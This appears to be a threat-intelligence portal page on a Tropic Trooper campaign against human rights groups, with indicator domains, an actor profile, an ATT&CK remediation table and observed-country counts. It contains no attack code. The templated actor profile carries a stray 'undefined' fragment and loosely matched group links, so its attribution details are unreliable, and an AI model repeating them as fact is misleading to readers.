Campaigns
Tropic Trooper's Silent Attack: A Destructive Cyber Campaign Against Human Rights Organizations

Tropic Trooper's Silent Attack: A Destructive Cyber Campaign Against Human Rights Organizations

TropicTrooperHumanRightsUnderAttackUmbracoUSBferryMalwarePIRATE PANDA
Tropic Trooper is a formidable force in the cyber realm, renowned for its expertise in espionage and data theft. The group's sophisticated attacks have made it a significant threat to sensitive targets, including governments, military organizations and human rights defenders, particularly in the Asia-Pacific region. In their latest campaign, they targeted human rights organizations and attempted to infiltrate air-gapped systems using new web shells and USB-based malware.

Indicators of Compromise

techmersion.com
blog.techmersion.com

APT Groups1

Pirate Pandaundefined

<p><b>Summary of Actor</b>:Pirate Panda, also known as APT 23, is a Chinese state-sponsored cyber espionage group. They have been active since at least 2009, primarily targeting entities in the defense, aerospace, and high-tech sectors.</p><p><b>General Features</b>:Pirate Panda is known for its sophisticated spear-phishing campaigns and custom malware development. They often use zero-day exploits and are adept at maintaining long-term access to compromised networks. Their operations are typically aligned with Chinese political and economic interests.</p><p><b>Related Other Groups</b>: APT10,APT1,Stone Panda</p><p><b>Indicators of Attack (IoA)</b>:</p><ul><li>Use of spear-phishing emails with malicious attachments</li><li>Deployment of custom malware like IXESHE, Etumbot</li><li>Use of compromised legitimate websites for watering hole attacks</li></ul><p></p><p><b>Recent Activities and Trends</b>:</p><ul><li><b>Latest Campaigns </b>: Recent campaigns have involved targeting defense contractors with spear-phishing emails containing malicious document attachments. They've also been observed leveraging vulnerabilities in Microsoft Office and Adobe Flash Player to gain initial access.</li><li><b>Emerging Trends </b>: There is an increasing use of fileless malware techniques and advanced obfuscation methods to evade detection. Additionally, Pirate Panda has been seen aligning more closely with Chinese Belt and Road Initiative targets, suggesting a strategic pivot.</li></ul><p></p>

APT 23Earth CentaurKeyBoyPirate PandaTropic TrooperBronze HobartIron

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION

Technique ID

Technique Name

Remediation

T1071.001

Application Layer Protocol: Web Protocols

Monitor network traffic for anomalies and use web security firewalls.

T1071.004

Application Layer Protocol: DNS

Implement DNS security solutions and restrict DNS queries to trusted servers.

T1119

Automated Collection

Limit USB device usage and employ centralized USB monitoring systems.

T1020

Automated Exfiltration

Use Data Loss Prevention (DLP) tools and encrypt portable devices.

T1547.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Use SIEM tools to monitor registry changes and perform frequent registry audits.

T1059.003

Command and Scripting Interpreter: Windows Command Shell

Restrict command-line access and use monitoring solutions to detect anomalies.

T1543.003

Create or Modify System Process: Windows Service

Limit system administrator permissions and monitor system service changes.

T1140

Deobfuscate/Decode Files or Information

Monitor file system for decryption attempts and use malware analysis tools.

T1573

Encrypted Channel

Use TLS monitoring tools to detect C2 communications over encrypted channels.

T1203

Exploitation for Client Execution

Apply security patches regularly and monitor for known vulnerabilities.

T1564.001

Hide Artifacts: Hidden Files and Directories

Use file integrity monitoring tools to detect suspicious hidden directories.

T1566.001

Phishing: Spearphishing Attachment

Educate users on phishing tactics and deploy email filtering and sandbox solutions.

Reports & References1

Observed Countries20

AE (238)
BH (425)
CN (782)
EG (336)
HK (321)
IL (703)
IQ (680)
IR (377)
JO (252)
KW (454)
LB (509)
OM (93)
PH (596)
PS (757)
QA (733)
SA (579)
SY (471)
TH (847)
TW (361)
YE (895)